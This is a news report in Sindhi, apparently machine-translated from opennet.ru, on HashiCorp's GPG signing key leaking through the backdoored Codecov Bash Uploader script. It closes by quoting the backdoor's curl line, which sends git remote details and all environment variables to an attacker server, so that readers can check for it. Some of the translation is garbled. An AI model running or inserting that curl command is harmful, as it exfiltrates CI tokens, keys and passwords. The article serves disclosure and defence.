HashiCorp، اوپن سورس ٽولز جي ترقي لاءِ ڄاتل سڃاتل آهي Vagrant، Packer، Nomad ۽ Terraform، پرائيويٽ GPG Key جي ليڪ جو اعلان ڪيو جيڪو ڊجيٽل دستخط ٺاهڻ لاءِ استعمال ڪيو ويو جيڪو رليز جي تصديق ڪري ٿو. حملو ڪندڙ جيڪي GPG ڪيچ تائين رسائي حاصل ڪري سگھن ٿا ممڪن طور تي HashiCorp پروڊڪٽس ۾ پوشیدہ تبديليون ڪري سگھن ٿيون انھن کي صحيح ڊجيٽل دستخط سان تصديق ڪندي. ساڳئي وقت، ڪمپني جو چوڻ آهي ته آڊٽ دوران، اهڙيون ترميمون ڪرڻ جي ڪوششن جي نشاندهي نه ڪئي وئي.
في الحال، سمجھوتي ٿيل GPG ڪيچ کي رد ڪيو ويو آھي ۽ ان جي جاء تي ھڪڙو نئون ڪي متعارف ڪرايو ويو آھي. مسئلو صرف SHA256SUM ۽ SHA256SUM.sig فائلن کي استعمال ڪندي تصديق کي متاثر ڪري ٿو، ۽ Linux DEB ۽ RPM پيڪيجز لاءِ ڊجيٽل دستخطن جي پيداوار تي اثر انداز نه ٿيو ریلیز.hashicorp.com ذريعي فراهم ڪيل، انهي سان گڏ MacOS ۽ ونڊوز (AuthentiCode) لاءِ جاري ڪيل تصديق واري ميڪانيزم. .
انفراسٽرڪچر ۾ Codecov Bash Uploader (codecov-bash) اسڪرپٽ جي استعمال جي ڪري ليڪ ٿيو، مسلسل انٽيگريشن سسٽم مان ڪوريج رپورٽون ڊائون لوڊ ڪرڻ لاءِ ٺهيل آهي. ڪوڊڪوف ڪمپني تي حملي دوران، هڪ پٺئين دروازي کي مخصوص اسڪرپٽ ۾ لڪايو ويو، جنهن ذريعي پاسورڊ ۽ انڪرپشن ڪيز حملي ڪندڙن جي سرور ڏانهن موڪليا ويا.
هيڪ ڪرڻ لاءِ، حملي ڪندڙن ڪوڊڪوف ڊاڪر جي تصوير ٺاهڻ جي عمل ۾ هڪ غلطي جو فائدو ورتو، جنهن کين GCS (گوگل ڪلائوڊ اسٽوريج) تائين پهچ واري ڊيٽا ڪڍڻ جي اجازت ڏني، جيڪا ڪوڊڪوف. ويب سائيٽ. تبديليون 31 جنوري تي واپس ڪيون ويون، ٻن مهينن تائين اڻڄاتل رهيون ۽ حملي ڪندڙن کي اجازت ڏني وئي ته صارف جي مسلسل انضمام واري نظام جي ماحول ۾ محفوظ ڪيل معلومات ڪڍي. شامل ڪيل بدسلوڪي ڪوڊ استعمال ڪندي، حملو ڪندڙ آزمائشي Git مخزن ۽ سڀني ماحوليات جي متغير بابت معلومات حاصل ڪري سگھن ٿا، بشمول ٽوڪن، انڪريپشن ڪيز ۽ پاسورڊ مسلسل انٽيگريشن سسٽم ڏانهن منتقل ٿيل ايپليڪيشن ڪوڊ، مخزن ۽ خدمتن جهڙوڪ Amazon Web Services ۽ GitHub تائين رسائي کي منظم ڪرڻ لاءِ.
سڌي ڪال کان علاوه، Codecov Bash Uploader اسڪرپٽ استعمال ڪيو ويو ٻين اپلوڊرن جي حصي طور، جهڙوڪ Codecov-action (Github)، Codecov-circleci-orb ۽ Codecov-bitrise-step، جن جا صارف پڻ متاثر ٿيا آهن. codecov-bash ۽ لاڳاپيل پراڊڪٽس جي سڀني صارفين کي انهن جي انفراسٽرڪچر جي آڊٽ ڪرڻ جي صلاح ڏني وئي آهي، انهي سان گڏ پاس ورڊ ۽ انڪرپشن ڪيز کي تبديل ڪريو. توهان اسڪرپٽ ۾ پٺئين دروازي جي موجودگي کي چيڪ ڪري سگهو ٿا لائن curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || سچو
جو ذريعو: opennet.ru